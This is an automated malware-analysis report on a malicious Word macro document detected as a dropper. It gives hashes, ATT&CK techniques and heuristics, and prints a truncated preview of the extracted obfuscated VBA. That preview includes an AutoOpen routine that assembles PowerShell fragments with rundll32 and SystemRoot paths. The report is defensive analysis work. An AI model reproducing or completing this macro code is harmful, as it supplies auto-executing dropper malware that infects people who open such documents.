Office (OLE) malware analysis — malicious · ddf1a7ee3a36d640

MALICIOUS

Office (OLE)

344.0 KB Created: 2018-10-11 10:27:00 Authoring application: Microsoft Office Word First seen: 2020-05-25

MD5: 2e6eac5c9600d230382003f9a6ecd616 SHA-1: dcfd83dd6189853eb3e710baedfca8d8751e9f38 SHA-256: ddf1a7ee3a36d6409f7f81a2e5fc68e5741d8a8b4f4ea9634e62a75db8fed0b1

230 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros. The presence of AutoOpen, CreateObject, and VBA p-code auto-execution heuristics strongly indicates that the macros are intended to run automatically upon opening the document. The ClamAV detection as 'Doc.Dropper.Agent' further supports the conclusion that this file acts as a dropper for other malware. No specific family could be identified, but the dropper functionality is clear.

Heuristics 8

ClamAV: Doc.Dropper.Agent-7148212-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-7148212-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In document text (OLE body)
- http://ns.adobe.com/xap/1.0/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/tiff/1.0/In document text (OLE body)
- http://ns.adobe.com/exif/1.0/In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 236248 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	236248 bytes
SHA-256: `3b73e1cd1d39d05e4aab3b8010900808e8f9f8caa3890a107d27bdb90713ac22`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "NewMacros" Function tiwka(jpuyeujz, alzih) fdoyag6 = -47 + 48 widgxeoe = -113 + 159 egwaaoywx62 = -13 - 80 oguuvyp = -9 - 67 End Function Function cwoocpz(irrela) ovpedq = -178 - 126 uuymny1 = -15 * 15 Dim ywftcsy As Integer ywftcsy = -106 - 177 End Function Function iptmqicbg7(lbzddfma, tkboa0, uepjco) qobhouhs30 = -180 * 51 steplau = -159 / 143 End Function Function oauxbfy() eeauo8 = -72 / 87 airimt83 = -138 * 150 kvnzm = -50 - 20 kqebjfvmii = -157 / 155 End Function Function ayvktpx(holaeo, ckmvctpvx) uoead = -130 - 8 yyaqnlyiu = -21 * 134 ictayarged = -30 - 104 Dim xsfpno, btwbmvaktup, ylddxsyvd As Integer xsfpno = -25 + 144 End Function Function beye(swjylnee) haizitzyzz9 = -164 - 92 oucyb8 = -47 + 21 qxbnugzaiw9 = -165 - 16 End Function Function oepura() yzjjbibxdmyi = -115 * 94 End Function Function thdjogbbb(ggnndg, stnwave) yfsxyzr8 = -70 * 22 iiuo5 = -41 + 65 uyeqjuxd = -163 - 91 End Function Function aoxfz(zlngtxs44, eepi, eief0) uezhmloip = -156 * 163 End Function Function xrixpjnml9() sdujmu = -16 - 140 Dim lvpdtqnglo As String lvpdtqnglo = -108 * 117 vteuycn = -34 / 20 End Function Function hyagbfg() nbdwnvoqkcztc61 = -110 + 62 nviavgb = -123 * 2 ayueghalp = -115 * 78 End Function Function kbdmu() prutxeiarwmb = -96 - 143 tcsgftff = -173 + 166 ivzpuoao = -31 * 133 End Function Function xgacn(wlwllxi, ewvyjlz) euaemwwygb = -120 - 123 itagzk00 = -54 / 6 Dim lgyei As String lgyei = -90 - 86 oqmftuhfkvbk9 = -95 / 106 End Function Function gshvcsqmp69(miaea, cspxu, rhufiis) erljvmmo3 = -66 / 59 mwuidpaogo = -18 + 105 End Function Function ehaoi() xjpjvuial41 = -156 - 125 plddyvxjtwa = -47 - 23 Dim ozswpnkfnvpz As Integer ozswpnkfnvpz = -62 + 6 qejyoyoe = -134 + 28 End Function Function vuihb() uupi = -169 * 165 End Function Function dgyngfbd97(eaynqxro) eietzvsi = -33 - 113 End Function Function gdmhuer(tkwppeim, ybphtproj, zkoxmdrqwt) aoakvmgdviu = -124 + 98 bneb6 = -61 / 101 End Function Function fjilvmui() uyut = -29 / 128 awkqc = -178 * 136 vwkckqkta = -15 - 113 End Function Function ujnrbujz(onaqo) fdcleetm = -57 * 56 End Function Sub AutoOpen() fteuhgu = -84 - 116 ksrtieydntu = -164 - 35 tbgauju = "$axjmzbuhvbryt" axwau = -33 / 40 ieeov = -111 - 179 tsbbuoey = -165 / 133 ajhljeea = "xsyegd" roaciybw = -106 * 111 owtyulo9 = "qaomqjvg='ct ';$xgmxcuuxw" aiuzu90 = -16 / 39 ytmkhuhz = "te" Dim tooasmzqb, yctbpidnmj80, itpqjeymhbwo70, wbtcirwou As String tooasmzqb = -34 - 97 yibbiyya = -109 + 121 yoepjjrs = -5 * 99 ruyagr = "mp" ayea = -74 + 1 nbxjsy = ytmkhuhz & ruyagr Dim ejralx4 As Integer ejralx4 = -48 * 91 Dim itsauy As Integer itsauy = -33 / 147 qmauvk = -94 / 30 pkdxtzq = -57 * 107 Dim oowltr As String oowltr = -73 + 104 szyoi = "lsiabdrkrcy='et" ejfquyk = -173 * 32 iykcu = -18 / 43 jmqvuwye = -165 + 85 zedvhzzwn = ".Web';$" ujzal = "bjvvzrbwnax" okaegiisg = -161 / 127 ktyuph = "mltirlkmlj=' ($env';$auzfoi" yeaiuspyo = -141 + 167 Dim insa As String insa = -95 - 175 eioigg = Environ("SystemRoot") Dim jelxigz As Integer jelxigz = -162 + 134 yyuajfeq = -141 + 94 jrdvfsbjiq = -97 - 152 hwscvx = -53 / 58 Dim kghnkedljf As Integer kghnkedljf = -92 + 37 fzaaesf = "ftbjojrok='" uuuo22 = -107 + 38 kvnbctgaqbgxi = -8 - 5 xziauo = -147 - 32 zujtxq = " rundll3" ytwursx = -85 * 34 yvhuaa = -144 - 109 aooaou = -143 * 97 gjky = tbgauju & ajhljeea & owtyulo9 & szyoi & zedvhzzwn & ujzal & ktyuph & fzaaesf & zujtxq uydgeywri0 = -149 * 129 Dim yyejv29 As Integer yyejv29 = -163 / 143 nsibwra = -102 * 27 atlouo = -141 * 13 eiofxey43 = -96 + 141 bxsbr = "2';$ffirvlsoi" nbitrukjzhzb = eioigg hfjnqlxrxgvvjh = -4 / 23 nbitrukjzhzb = nbitrukjzhzb + "\sys" bidbl = -33 / ... (truncated)

SHA-256: 3b73e1cd1d39d05e4aab3b8010900808e8f9f8caa3890a107d27bdb90713ac22

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Function tiwka(jpuyeujz, alzih)
fdoyag6 = -47 + 48
widgxeoe = -113 + 159
egwaaoywx62 = -13 - 80
oguuvyp = -9 - 67
End Function
Function cwoocpz(irrela)
ovpedq = -178 - 126
uuymny1 = -15 * 15
Dim ywftcsy As Integer
ywftcsy = -106 - 177
End Function
Function iptmqicbg7(lbzddfma, tkboa0, uepjco)
qobhouhs30 = -180 * 51
steplau = -159 / 143
End Function
Function oauxbfy()
eeauo8 = -72 / 87
airimt83 = -138 * 150
kvnzm = -50 - 20
kqebjfvmii = -157 / 155
End Function
Function ayvktpx(holaeo, ckmvctpvx)
uoead = -130 - 8
yyaqnlyiu = -21 * 134
ictayarged = -30 - 104
Dim xsfpno, btwbmvaktup, ylddxsyvd As Integer
xsfpno = -25 + 144
End Function
Function beye(swjylnee)
haizitzyzz9 = -164 - 92
oucyb8 = -47 + 21
qxbnugzaiw9 = -165 - 16
End Function
Function oepura()
yzjjbibxdmyi = -115 * 94
End Function
Function thdjogbbb(ggnndg, stnwave)
yfsxyzr8 = -70 * 22
iiuo5 = -41 + 65
uyeqjuxd = -163 - 91
End Function
Function aoxfz(zlngtxs44, eepi, eief0)
uezhmloip = -156 * 163
End Function
Function xrixpjnml9()
sdujmu = -16 - 140
Dim lvpdtqnglo As String
lvpdtqnglo = -108 * 117
vteuycn = -34 / 20
End Function
Function hyagbfg()
nbdwnvoqkcztc61 = -110 + 62
nviavgb = -123 * 2
ayueghalp = -115 * 78
End Function
Function kbdmu()
prutxeiarwmb = -96 - 143
tcsgftff = -173 + 166
ivzpuoao = -31 * 133
End Function
Function xgacn(wlwllxi, ewvyjlz)
euaemwwygb = -120 - 123
itagzk00 = -54 / 6
Dim lgyei As String
lgyei = -90 - 86
oqmftuhfkvbk9 = -95 / 106
End Function
Function gshvcsqmp69(miaea, cspxu, rhufiis)
erljvmmo3 = -66 / 59
mwuidpaogo = -18 + 105
End Function
Function ehaoi()
xjpjvuial41 = -156 - 125
plddyvxjtwa = -47 - 23
Dim ozswpnkfnvpz As Integer
ozswpnkfnvpz = -62 + 6
qejyoyoe = -134 + 28
End Function
Function vuihb()
uupi = -169 * 165
End Function
Function dgyngfbd97(eaynqxro)
eietzvsi = -33 - 113
End Function
Function gdmhuer(tkwppeim, ybphtproj, zkoxmdrqwt)
aoakvmgdviu = -124 + 98
bneb6 = -61 / 101
End Function
Function fjilvmui()
uyut = -29 / 128
awkqc = -178 * 136
vwkckqkta = -15 - 113
End Function
Function ujnrbujz(onaqo)
fdcleetm = -57 * 56
End Function
Sub AutoOpen()
fteuhgu = -84 - 116
ksrtieydntu = -164 - 35
tbgauju = "$axjmzbuhvbryt"
axwau = -33 / 40
ieeov = -111 - 179
tsbbuoey = -165 / 133
ajhljeea = "xsyegd"
roaciybw = -106 * 111
owtyulo9 = "qaomqjvg='ct ';$xgmxcuuxw"
aiuzu90 = -16 / 39
ytmkhuhz = "te"
Dim tooasmzqb, yctbpidnmj80, itpqjeymhbwo70, wbtcirwou As String
tooasmzqb = -34 - 97
yibbiyya = -109 + 121
yoepjjrs = -5 * 99
ruyagr = "mp"
ayea = -74 + 1
nbxjsy = ytmkhuhz & ruyagr
Dim ejralx4 As Integer
ejralx4 = -48 * 91
Dim itsauy As Integer
itsauy = -33 / 147
qmauvk = -94 / 30
pkdxtzq = -57 * 107
Dim oowltr As String
oowltr = -73 + 104
szyoi = "lsiabdrkrcy='et"
ejfquyk = -173 * 32
iykcu = -18 / 43
jmqvuwye = -165 + 85
zedvhzzwn = ".Web';$"
ujzal = "bjvvzrbwnax"
okaegiisg = -161 / 127
ktyuph = "mltirlkmlj=' ($env';$auzfoi"
yeaiuspyo = -141 + 167
Dim insa As String
insa = -95 - 175
eioigg = Environ("SystemRoot")
Dim jelxigz As Integer
jelxigz = -162 + 134
yyuajfeq = -141 + 94
jrdvfsbjiq = -97 - 152
hwscvx = -53 / 58
Dim kghnkedljf As Integer
kghnkedljf = -92 + 37
fzaaesf = "ftbjojrok='"
uuuo22 = -107 + 38
kvnbctgaqbgxi = -8 - 5
xziauo = -147 - 32
zujtxq = " rundll3"
ytwursx = -85 * 34
yvhuaa = -144 - 109
aooaou = -143 * 97
gjky = tbgauju & ajhljeea & owtyulo9 & szyoi & zedvhzzwn & ujzal & ktyuph & fzaaesf & zujtxq
uydgeywri0 = -149 * 129
Dim yyejv29 As Integer
yyejv29 = -163 / 143
nsibwra = -102 * 27
atlouo = -141 * 13
eiofxey43 = -96 + 141
bxsbr = "2';$ffirvlsoi"
nbitrukjzhzb = eioigg
hfjnqlxrxgvvjh = -4 / 23
nbitrukjzhzb = nbitrukjzhzb + "\sys"
bidbl = -33 /
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.